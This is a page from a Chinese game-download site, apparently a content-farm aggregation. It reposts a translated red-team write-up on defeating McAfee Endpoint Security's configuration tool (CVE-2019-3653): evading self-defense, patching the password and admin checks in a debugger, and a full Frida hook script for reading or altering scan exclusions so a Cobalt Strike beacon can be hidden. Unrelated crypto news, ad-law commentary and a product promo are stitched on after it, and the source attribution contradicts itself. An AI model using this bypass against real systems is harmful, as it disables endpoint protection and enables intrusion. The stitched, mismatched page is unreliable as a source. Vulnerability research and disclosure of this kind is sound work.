速安GeChe手游下载站_最新手机游戏下载门户网站!

游戏更新 | 安卓游戏 | 苹果游戏 | 推荐游戏 | 软件更新 | 文章更新 | 热门文章
您的位置: 首页  →  攻略 → 《迈克菲杀毒软件破解(利用Mcafee管理工具绕过McAfee杀毒软件)

迈克菲杀毒软件破解(利用Mcafee管理工具绕过McAfee杀毒软件)

2023-02-14 06:56:57      小编:网络整理      我要评论

迈克菲杀毒软件破解文章列表:

迈克菲杀毒软件破解(利用Mcafee管理工具绕过McAfee杀毒软件)

利用Mcafee管理工具绕过McAfee杀毒软件

介绍

这篇文章是关于我在一次红队活动中如何利用McAfee工具绕过McAfee Endpoint Security杀毒软件的故事。本来我没有计划写这篇文章,但当时的队友@fsdominguezand和@_dirkjan觉得此事值得被记录下来。现在,就让我们开始吧。

McAfee

在以往,每当我们遇到McAfee Virus Scan Enterprise(VSE)的时候,都可以通过简单地查询注册表,了解到那些位置是管理员指定的“特殊位置”(不受杀毒软件影响)。

然而,在这次任务中,事情没那么简单。因为他们使用的是McAfee Endpoint Security,从VSE时代到现在,McAfee可能认为最好不要将“特殊位置”之类的信息以明文形式存储在任何人都可阅读的文件中。

那么,我们现在该把恶意文件放在哪里?

ESConfigTool

McAfee Endpoint Security杀毒软件附带一个名为ESConfigTool的程序,可用于导入和导出配置文件。它的详细用法如下。

我们发现,要从McAfee Endpoint Security得知安全设置,你需要:

解锁密码

管理权限

很遗憾这两者我们都没有。

现在,先让我们下载一个试用版本的McAfee Endpoint Security,看看是否有入手点。

变化

我们最后决定还是以ESConfigTool为目标,看看它是否有漏洞。我先创建了三个“特殊位置”:

C:WindowsTemp

*mimikatz.exe

C:TotallyLegit

还设置了密码保护:starwars。

打开一个cmd,看看我们是否可以得到这些设置信息。

Microsoft Windows [Version 10.0.16299.15](c) 2017 Microsoft Corporation. All rights reserved.C:Windowssystem32>"C:Program FilesMcAfeeEndpoint SecurityEndpoint Security PlatformESConfigTool.exe" /export C:Export.xml /module TP /unlock starwars /plaintextCommand executed successfully. Please refer to Endpoint Security logs for detailsC:Windowssystem32>

让我们打开xml文件,看看是否有敏感信息:

<EXCLUSION_ITEMS> <EXCLUSION_ITEM> <EXCLUSION_BY_NAME_OR_LOCATION>C:Windowstemp</EXCLUSION_BY_NAME_OR_LOCATION> <EXCLUSION_FILE_TYPE /> <EXCLUSION_BY_FILE_AGE>0</EXCLUSION_BY_FILE_AGE> <EXCLUSION_TYPE>3</EXCLUSION_TYPE> <EXCLUSION_EXCLUDE_SUBFOLDERS>1</EXCLUSION_EXCLUDE_SUBFOLDERS> <EXCLUSION_ON_READ>1</EXCLUSION_ON_READ> <EXCLUSION_ON_WRITE>1</EXCLUSION_ON_WRITE> <EXCLUSION_SOURCE>0</EXCLUSION_SOURCE> </EXCLUSION_ITEM> <EXCLUSION_ITEM> <EXCLUSION_BY_NAME_OR_LOCATION>***mimikatz.exe</EXCLUSION_BY_NAME_OR_LOCATION> <EXCLUSION_FILE_TYPE /> <EXCLUSION_BY_FILE_AGE>0</EXCLUSION_BY_FILE_AGE> <EXCLUSION_TYPE>3</EXCLUSION_TYPE> <EXCLUSION_EXCLUDE_SUBFOLDERS>0</EXCLUSION_EXCLUDE_SUBFOLDERS> <EXCLUSION_ON_READ>1</EXCLUSION_ON_READ> <EXCLUSION_ON_WRITE>1</EXCLUSION_ON_WRITE> <EXCLUSION_SOURCE>0</EXCLUSION_SOURCE> </EXCLUSION_ITEM> <EXCLUSION_ITEM> <EXCLUSION_BY_NAME_OR_LOCATION>C:TotallyLegit</EXCLUSION_BY_NAME_OR_LOCATION> <EXCLUSION_FILE_TYPE /> <EXCLUSION_BY_FILE_AGE>0</EXCLUSION_BY_FILE_AGE> <EXCLUSION_TYPE>3</EXCLUSION_TYPE> <EXCLUSION_EXCLUDE_SUBFOLDERS>1</EXCLUSION_EXCLUDE_SUBFOLDERS> <EXCLUSION_ON_READ>1</EXCLUSION_ON_READ> <EXCLUSION_ON_WRITE>1</EXCLUSION_ON_WRITE> <EXCLUSION_SOURCE>0</EXCLUSION_SOURCE> </EXCLUSION_ITEM></EXCLUSION_ITEMS>

是的,在拥有管理员权限以及输入了正确密码的情况下,你可以得到安全设置。让我们通过x64dbg软件,看一下它的整体流程。

Self-defense

通常使用调试软件打开二进制文件是很简单的,但由于我们面对的是安全软件,所以有一些额外的障碍。一个重要的原因是,McAfee的大部分组件都有“自卫”功能。如果你尝试使用调试软件,将立即得到一个Debugging stopped消息,McAfee对这种可疑行为极为敏感。

12/10/2019 12:47:09 mfeesp(2204.6392) <SYSTEM> ApBl.SP.Activity: DESKTOP-DNUK2R5admin ran X64DBG.EXE, which attempted to access ESCONFIGTOOL.EXE, violating the rule "Core Protection - Protect McAfee processes from unauthorized access and termination", and was blocked. For information about how to respond to this event, see KB85494.12/10/2019 12:47:09 mfeesp(2204.5404) <SYSTEM> ApBl.SP.Activity: DESKTOP-DNUK2R5admin ran X64DBG.EXE, which attempted to access ESCONFIGTOOL.EXE, violating the rule "Core Protection - Protect McAfee processes from unauthorized access and termination", and was blocked. For information about how to respond to this event, see KB85494.

看来我们首先需要绕过这种自我防御机制。

Microsoft Windows [Version 10.0.16299.15](c) 2017 Microsoft Corporation. All rights reserved.C:Usersadmin>mkdir tempC:Usersadmin>cd tempC:temp>copy "C:Program FilesMcAfeeEndpoint SecurityEndpoint Security PlatformESConfigTool.exe" . 1 file(s) copied.C:temp>copy "C:Program FilesMcAfeeEndpoint SecurityEndpoint Security Platformblframework.dll" . 1 file(s) copied.C:temp>copy "C:Program FilesMcAfeeEndpoint SecurityEndpoint Security PlatformEpSecApiLib.dll" . 1 file(s) copied.C:temp>copy "C:Program FilesMcAfeeEndpoint SecurityEndpoint Security PlatformMcVariantExport.dll" . 1 file(s) copied.C:temp>copy "C:Program FilesMcAfeeEndpoint SecurityEndpoint Security PlatformLogLib.dll" . 1 file(s) copied.C:temp>

没错,只要像如上所述疯狂复制文件,你就可以绕过自我防御,对软件进行调试。现在,让我们开始调试吧。

绕过密码检查

先让我们看看当使用错误的密码时会发生什么,也许会有一些字符提示:

C:Windowssystem32>"C:Program FilesMcAfeeEndpoint SecurityEndpoint Security PlatformESConfigTool.exe" /export C:Export.xml /module TP /unlock startrek /plaintextThere were some errors while executing command. Please refer to Endpoint Security logs for detailsC:Windowssystem32>

嗯,没什么特别的。不过McAfee的日志文件提供了更多信息:

10/12/2019 01:11:46.400 PM ESConfigTool(5476.8840) <admin> ESConfigTool.ESConfigTool.Error (ImportExportUtil.cpp:677): Failed to unlock client settings with user supplied password, TriggerAction failed

让我们在调试器中搜索特定字符串,看看能否找到这个错误的来源。

现在我们把这个位置设为断点,再运行一次,看看在断点之前发生了什么。我们可以看到一个函数调用了一个名为BLInvokeMethod的东西,后面还跟着一个没有执行的跳转:

此时,我们有两个选择:

    进入密码检查函数,看看它是如何工作的,并尝试破解密码。

    直接更改检查函数的返回值。

因为我很懒,我所以选择了第2项。当输入错误的密码时,密码检查函数会将错误代码放入RAX寄存器:

如果提供了正确的密码,则RAX寄存器的值为0:

那么,如果我们提供了错误的密码,将密码检查函数中断,并将RAX寄存器的值改为0,会发生什么情况呢?

成功导出设置!

看来密码检查只是由工具本身完成的,不牵涉其他组件,也不需要解密。

绕过管理员权限

在没有管理员权限的情况下,ESConfigTool工具能使用的功能是非常有限的:

Microsoft Windows [Version 10.0.16299.15](c) 2017 Microsoft Corporation. All rights reserved.C:Usersuser>"C:Program FilesMcAfeeEndpoint SecurityEndpoint Security PlatformESConfigTool.exe" /export C:tempExport.xml /module TP /unlock starwars /plaintextDescription: Endpoint security configuration tool for exporting and importing policy configuration. User needs administrator privileges to run this utility. Utility needs password if the client interface is password protected. File supplied for import must be an encrypted file.USAGE: ESConfigTool.exe /export <filename> [/module <TP|FW|WC|ESP> ] [/unlock <password> ] [/plaintext ] ESConfigTool.exe /import <filename> [/module <TP|FW|WC|ESP> ] [/unlock <password> ] [/policyname <name> ] ESConfigTool.exe /helpC:Usersuser>

我们怎样才能知道权限检查的流程呢?先让我们以普通用户的身份运行调试器,看看会发生什么。发现它调用一个函数,并对返回值进行字符串比较,如果返回代码不是0,则调用“exit”。

如果追踪这个函数,会发现它将最终调用AllocateAndInitializeSid。不过这些都不值得花时间去逆向。让我们再次尝试偷懒的方法更改函数返回值。

返回值检查如下:

这一次返回值必须是0以外的任何值。

OK,又成功了!

我们现在可以从McAfee Endpoint Security导出安全设置,不需要管理权限,不需要知道正确的密码!

自动运行

到目前为止,一切都很顺利,但是每次使用调试器更改返回值是一件痛苦的事情。不过幸运的是,存在Frida这么一个有趣的东西,它可以帮你做所有很酷的事情,比如hook函数或改变其返回值,你不需要任何额外的技能,除了javascript!

那么我们如何将Frida注入到McAfee呢?很简单,frida-server。只需在运行McAfee的机器上启动它,然后使用Python进行连接。

McAfee机器:

Microsoft Windows [Version 10.0.16299.15](c) 2017 Microsoft Corporation. All rights reserved.C:Usersadmin>cd tempC:temp>frida-server-12.7.9-windows-x86_64.exe

Python机器:

Python 3.6.7 (default, Oct 22 2018, 11:32:17) [GCC 8.2.0] on linuxType "help", "copyright", "credits" or "license" for more information.>>> import frida>>> devmgr = frida.get_device_manager()>>> devmgr.add_remote_device('192.168.31.150')Device(id="tcp@192.168.31.150", name="192.168.31.150", type='remote')>>> rdev = frida.get_device('tcp@192.168.31.150')>>> args = [... 'ESConfigTool.exe',... '/export',... 'frida-export.xml',... '/module',... 'ESP',... '/unlock',... 'startrek',... '/plaintext'... ]>>> pid = rdev.spawn(args)>>> session = rdev.attach(pid)>>> sessionSession(pid=11168)

现在我们已经连接上,ESConfigTool.exe也正在运行!

现在我们可以将JS代码注入到ESConfigTool进程中。

Frida脚本

我不会详细介绍这个脚本的功能,其完整代码如下:

const configbase = Module.findbaseAddress('ESConfigTool.exe');//const adminCheck = configbase.add(0x5240); //32const adminCheck = configbase.add(0x5f30); //64const BLInvokeMethod = Module.findExportByName('blframework.dll','BLInvokeMethod')console.log('[-] base address is:',configbase);console.log('[-] Admin check is:',adminCheck);console.log('[-] BLInvokeMethod:',BLInvokeMethod);Interceptor.attach(adminCheck, { onEnter: function (args) { console.log('[ ] Hooked admin check function'); }, onLeave: function (retval) { console.log('[ ] Returning true for admin check'); retval.replace(1); }});Interceptor.attach(BLInvokeMethod, { onEnter: function (args) { console.log('[ ] Hooked BLInvokeMethod function'); }, onLeave: function (retval) { console.log('[ ] Patching password check function'); retval.replace(0x0); }});

这个脚本执行的正是我们在调试器中手动执行的操作,更改返回值。让我们注入脚本,看看它是否有效:

>>> script = """... const configbase = Module.findbaseAddress('ESConfigTool.exe');... //const adminCheck = configbase.add(0x5240); //32... const adminCheck = configbase.add(0x5f30); //64... const BLInvokeMethod = Module.findExportByName('blframework.dll','BLInvokeMethod')... ... console.log('[-] base address is:',configbase);... console.log('[-] Admin check is:',adminCheck);... console.log('[-] BLInvokeMethod:',BLInvokeMethod);... ... Interceptor.attach(adminCheck, {... onEnter: function (args) {... console.log('[ ] Hooked admin check function');... },... onLeave: function (retval) {... console.log('[ ] Returning true for admin check');... retval.replace(1);... }... });... ... Interceptor.attach(BLInvokeMethod, {... onEnter: function (args) {... console.log('[ ] Hooked BLInvokeMethod function');... },... onLeave: function (retval) {... console.log('[ ] Patching password check function');... retval.replace(0x0);... }... });... ... """>>> session.create_script(script).load()[-] base address is: 0x7ff73ed30000[-] Admin check is: 0x7ff73ed35f30[-] BLInvokeMethod: 0x7ffa4d759730>>> rdev.resume(pid)>>> [ ] Hooked admin check function[ ] Returning true for admin check[ ] Hooked BLInvokeMethod function[ ] Patching password check function>>>

最终结果如下:

虽然我是作为“admin”用户运行的,但是没有涉及UAC。相信我,这套方法也适用于普通用户。

后续

现在,我们就可以把一个Cobalt Strike beacon放入那些“特殊位置”。尽管在本文中只讨论了设置信息导出,但你也可以导入配置文件,添加“特殊位置”,更改其他设置,甚至完全删除密码。

值得一提的是,其实这个配置文件加密与否并不重要,因为你可以把它导入自己的McAfee软件进行查看。

McAfee在确认了漏洞后,发布了一个安全建议和相关的修复程序,漏洞被标记为CVE-2019-3653。

如果你想了解更多,可以在这里找到PoC脚本。

本文由白帽汇整理并翻译,不代表白帽汇任何观点和立场

来源:https://dmaasland.github.io/posts/mcafee.html

原文:https://www.loosebyte.com/google-cloud-vulnerability/

白帽汇从事信息安全,专注于安全大数据、企业威胁情报。

公司产品:FOFA-网络空间安全搜索引擎、FOEYE-网络空间检索系统、NOSEC-安全讯息平台。

为您提供:网络空间测绘、企业资产收集、企业威胁情报、应急响应服务。

OK新公告惹巨大争议,MT.Gox赔付新方案出台

​1【OK发布新公告引发群友热议】

OK发了新公告:USER ID为2051247的用户, 7月31日凌晨2点开始进行了大量的多头建仓异常交易。OKEx的风控部门监控到此异常行为后,立即采取措施,多次沟通联系该客户要求其减仓来降低市场风险,经过多次沟通后,该用户拒不配合,OKEx平台遂冻结其账户,但由于BTC价格急剧下跌,最终导致其仓位爆仓。

该公告发出后,瞬间引发群友热议。

异客点评:话说这个公告真是读完让人欲罢不能……有钱了不起么?居然敢做多?还敢多次“提醒风险”后不听?瞧被封号了吧?你看爆仓了吧,这可真的不怪我OK不仗义啊,我OK可是仁至义尽了……这只能是你不听话可是怪不了别人。

​2【Mt. Gox赔付方案更新:价值13亿美元的BTC和BCH付给债权人,其余币种换成现金】

该方案指出,在Mt. Gox留有比特币和BCH的债权人应该同样以比特币和BCH的形式得到赔偿,而不是现金。这部分资产价值超过了13亿美元。

另外,其他加密货币(除比特币和BCH以外)都应兑换成现金支付给债权人。

异客点评:躺赢,绝对的躺赢……这帮用户刚开始以为自己掉进了天坑,如今看居然是掉进了蜜罐!正所谓“三十年河东,三十年河西”,数字货币领域变化实在是太快,谁能想得到会是这么个状况?按这趋势发展,估计不少投资人要把法胖供起来当爸爸……

​3【分析:BTC日元交易量占比第一或因计入衍生品交易额】

据CoinDesk的一项研究发现,在被广泛引用的比特币交易数据中,存在一些方法上的缺陷,这些数据似乎夸大了日元作为交易组合的重要性。

Coindesk收集了7月26日至30日的交易数据并进行了分析,结果表明,美元,而不是日元,是比特币交易的主要货币。

异客点评:早就觉得不对……日元能当老大就不对劲,日本币民就算是天天大保健也花不了那么多钱,果不其然是计算方法出了岔子。现在交易主力主要还是美元,美元才是绝对大头,美帝人民嗷嗷买币被套,也算是为世界币圈做出巨大贡献。

​4【迈克菲比特币钱包BitFi被破防】

McAfee杀毒软件创始人约翰·迈克菲在今年6月与Bitfi团队共同推出Bitfi钱包,高调宣称其钱包是世界上第一个牢不可破的硬件钱包。 ​​​

昨日,来自荷兰的安全研究人员“OverSoft”发表推特消息称,他已经拿到了这款加密货币钱包的根访问(root access)权限。

此外,本周四,还有一个名为Saleem Rashid的15岁黑客也在网上发文称,他已成功攻破Bitfi钱包。

异客点评:迈克菲同学,你这样可就不对了……上次大嘴巴唱多的事还没完呢,动不动吹牛那可是要被全世界币民所鄙视的。按道理,你这就应该“言出必行”,当初好像可说是:谁能破解就给10万美元。可现在咋还没动静呢?这可不行啊兄弟……下次选个靠谱点的平台站台吧,不然,恐怕还得被人下毒……​​​​

杀毒软件巨头迈克菲将被安宏资本牵头的投资者团体收购,交易价值或超140亿美元

《华尔街日报》11月9日消息,安全软件公司迈克菲表示,将被一个投资者团体以每股26美元的全现金方式收购,按股权价值计算,该交易价值约为120亿美元,按包括债务在内的企业价值计算,该交易价值超过140亿美元。

迈克菲称,此次交易由安宏资本、Permira Advisers LLC、Crosspoint Capital Partners、加拿大年金计划投资委员会、新加坡政府投资公司和阿布扎比投资局的一家全资子公司牵头。

360弹窗广告是否违法,用360还是迈克菲

我用的电脑是华硕笔记本电脑,感觉挺不错,电脑预装迈克菲杀毒防护软件,有一段时间的试用期,现在试用期已经过了200多天了,一直没有花钱购买。前段时间下载了360安全卫士免费防护软件,用着还行,就是弹窗广告太多了。用迈克菲软件时我记得很清净,没有那么多乱七八糟的东西。

对于企业来说,这或许是两种经营模式或盈利模式,对于用户来说,又是两种体验。

对于作为用户的我来说,是花点钱购买迈克菲,还是免费体验360。

迈克菲的价格:

一台电脑一年只需要60元,也就是抽包华子的价格。贵吗?真不贵。

再看看360

360安全卫士软件免费,并将免费进行到底,但是360互联网增值和在线广告占其收入的99%,所以就会出现这样的情形:

很烦人的弹窗广告。有的说可以在设置里取消勾选、取消勾选、一直取消勾选……可以把弹窗广告彻底搞定。但是对于大多数普通的电脑用户来说,好像都得百度上搜索经验。一般作法是出来一个关掉一个,好像还有什么点击近期不显示,忽略全部等,但没多长时间又出来啦。没办法,人家360也要生存呀,没有这些广告收入怎么支撑360安全卫士的免费呢?

但是360这种弹窗广告是否合法呢?

《中华人民共和国广告法》第四十四条规定:

利用互联网从事广告活动,适用本法的各项规定。

利用互联网发布、发送广告,不得影响用户正常使用网络。在互联网页面以弹出等形式发布的广告,应当显著标明关闭标志,确保一键关闭。

根据上述《广告法》,360利用互联网发布、发送广告,因为是在右下角,而并不是整个互联网页面,虽然对用户上网或办公有影响,但如果说影响用户正常使用网络则未免牵强。而且根据上述条文,法律是允许在互联网页面以弹出等形式发布广告的,但是应当显著标明关闭标志,确保一键关闭。即首先关闭标志要明显,不能特别隐蔽,找半天找不到;另外,要能确保一键关闭,不能点击关闭了却出来另外一个广告页面,需要重新关闭。

对比一下,360的弹窗广告关闭标志还算显著,且能够一键关闭,虽然影响了用户的使用体验,但是似乎并不违法。

反之,如果关闭标志不明显,或不能一键关闭,则是明显违反《广告法》的。

用迈克菲还是用360?最终,我还是选择了360。可能大多数人都是这样吧,有免费的为什么要掏钱呢?麻烦就麻烦点儿吧。

法律无非情理,人生需要学习。

关注我@国际庄小律师,了解更多。

AV-C:百度手机卫士是最易用手机安全软件受捧

近日,国际权威的反病毒评测机构AV-C(AV-Comparitives)发布最新一期移动安全软件测试报告,在众多如卡巴斯基、McAfee等国内外知名安全产品中,百度手机卫士凭借国际领先综合安全能力,被赞是最易用手机安全软件,这也是百度手机卫士在本年度获得的又一殊荣。

据了解,本次测试保持了AV-C一贯的严谨风格和高含金量,测试样本多、测试项目丰富,可以说是对手机安全软件的“十项全能”大考。据悉,AV-C测试对参加测厂商资质要求严苛。此前,AV-C曾于2010年和2011年分别举行过两次手机安全软件测试,入围者均为国外顶级安全厂商,而本次AV-C测试是第一次有中国安全厂商产品入围,且百度手机卫士首次参测就顺利通过测试,表现抢眼。

AV-C移动安全软件评测报告 百度手机卫士顺利通过

在手机加速、垃圾清理、骚扰拦截、病毒查杀等基础检测方面,百度手机卫士以优异的成绩顺利过关,凸显其在手机病毒查杀领域的技术实力。AV-C就对此高度评价道:“百度手机卫士是一款相当易用的安卓手机安全产品。”事实上,百度手机卫士自推出以来,一直以解决用户移动互联时代最为迫切的安全需求为目标。其主打的“防吸费省流量终结恶意软件的”核心功能,解决了手机恶意扣费、流量偷跑以及恶意软件破坏等智能手机用户普遍担忧的手机安全问题。

除此之外,百度手机卫士创新的 “流量防偷跑”“智能防诈骗”(安全短信)等功能,也都受到了AV-C测试的认可及好评。用户可以通过“流量监控”功能随时查看手机数据流量情况,以及引起流量异常的应用。而“安全短信”功能,可以帮助用户按照短信内容和重要性进行分类整理,对短信中的恶意号码、风险链接及时标注提醒,为支付验证类短信提供专门保护。

值得注意的是,百度手机卫士在今年推出的“安全支付亿元保赔”计划得到了AV-C测试的重点关注。今年3月,针对移动支付浪潮中支付安全威胁凸显的问题,百度手机卫士业界首家推出支付安全“环形防护”解决方案,为支付宝钱包及网银APP的运行创造“安全环境”,WIFI网络的安全性以及与网银支付有关的短信都可以收到百度手机卫士的保护。5月份继而推出“亿元保赔计划,百度手机卫士承诺凡是加入该计划的用户如果遭遇意外财产损失,百度手机卫士就会提供单笔最高3000元,全年最高10万元的全额保赔,在移动支付迅速普及的今天,亿元保赔计划可谓给用户上了“双保险”。相关业内人士表示,2014年移动支付、手机财产安全是用户最为关心的焦点,针对用户最关心这些安全问题,百度手机卫士适时推出 “安全支付亿元保赔计划”,可谓真正免除了用户使用互联网金融交易的后顾之忧。

而在国际著名安全软件评测机构AV-Test评测中,百度手机卫士杀毒引擎已经连续4次以病毒查杀率100%、误报率0%、性能满分的成绩斩获AV-Test评测冠军,与国际老牌公司Avira、Bitdefender、McAfee(迈克菲)和 Trend Micro(趋势科技)等公司的安全产品并列。

正是由于其良好的用户体验和扎实的产品功能创新,目前百度手机卫士用户已经突破3亿,成为移动互联时代成长最快,最受用户喜爱的移动安全品牌。百度手机卫士相关负责人表示,未来会进一步对产品功能进行改进和完善,继续为用户带来更优质的产品服务。

  • 最新游戏
  • 发表评论
手游排行 新游中心 热门专区 手机软件APP下载
网游排行榜 游戏攻略 网游下载 安卓软件APP下载
单机排行榜 手游礼包 单机下载 苹果ios应用下载
安卓排行榜 新游视频 手游下载
苹果排行榜